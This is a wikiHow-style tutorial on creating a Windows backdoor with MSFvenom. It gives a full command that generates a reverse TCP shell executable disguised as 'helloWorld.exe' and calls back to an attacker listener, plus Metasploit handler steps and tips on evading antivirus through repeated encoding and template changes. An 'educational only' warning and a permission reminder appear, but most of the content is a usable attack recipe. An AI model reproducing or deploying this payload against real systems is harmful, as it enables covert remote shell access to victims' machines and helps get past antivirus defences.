PDF download Download Article PDF download Download Article

A backdoor is used to bypass security mechanisms, often secretly and mostly undetectably. Using MSFvenom, the combination of msfpayload and msfencode, it's possible to create a backdoor that connects back to the attacker by using reverse shell TCP. In order to develop a backdoor, you need to change the signature of your malware to evade any antivirus software. Complete this project on a pair of computers that you have permission to access, and in the process, you'll learn more about computer security and how this kind of backdoor works.

  1. Advertisement
    • You will use x86/shikata_ga_nai as the encoder.
  2. Type "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
    • -a x86 --platform windows designates architecture to use.
    • -p windows/shell/reverse_tcp designates the payloads to embed.
    • LHOST designates the listener IP address.
    • LPORT designates the listener port.
    • -b "\x00" designates to avoid bad character (null bytes).
    • -e x86/shikata_ga_nai designates the encoders name.
    • -f exe > helloWorld.exe designates format output.
    • Now you have generated your backdoor. When the victim clicks on helloWorld.exe, the shell payload that is embedded will be activated and make a connection back to your system. In order to receive the connection, you have to open the multi-handler in Metasploit and set the payloads.
    • "LHOST" designates the listener IP address.
    • "LPORT" designates the listener port.
  3. Then you will be successfully connected to the victim's machine.
  4. Advertisement

Community Q&A

Search
Add New Question
  • Question
    What do I do if an error pops up when creating the exploit?
    MOHMMD ELFA
    Community Answer
    Make sure you did everything correctly and try again. Make sure your are running Kali Linux.
Ask a Question
      Advertisement

      Tips

      • Using -i <numbers> in MSFvenom will represent the iterations the encoding. Sometimes more iterations may help to evade the AV software.
      • You have learned how to generate the backdoor and encoded by using MSFvenom, but this method will not work perfectly against some of the AV software nowadays. The reason behind this is because of the execution templates in MSFvenom. The AV vendors have added the static signature of these templates and just look for them. The solution for this issue is to use a different execution template or different tools.
      Submit a Tip
      All tip submissions are carefully reviewed before being published
      Thanks for submitting a tip for review!
      Advertisement

      Warnings

      • This article is for educational purpose only. Hacking without authorization or permission is unethical and often illegal.
      Advertisement

      Things You'll Need

      • Kali Linux
      • Windows
      • Virtual machine
        • VirtualBox

      References

      1. OCCUPYTHEWEB. Metasploit for the Aspiring Hacker, Part 5 (Msfvenom). from http://null-byte.wonderhowto.com/how-to/hack-like-pro-metasploit-for-aspiring-hacker-part-5-msfvenom-0159520/
      2. thelightcosine. The Odd Couple: Metasploit and Antivirus Solutions (Dec 13, 2012). from https://community.rapid7.com/community/metasploit/blog/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions

      About This Article

      Thanks to all authors for creating a page that has been read 124,217 times.

      Is this article up to date?

      Advertisement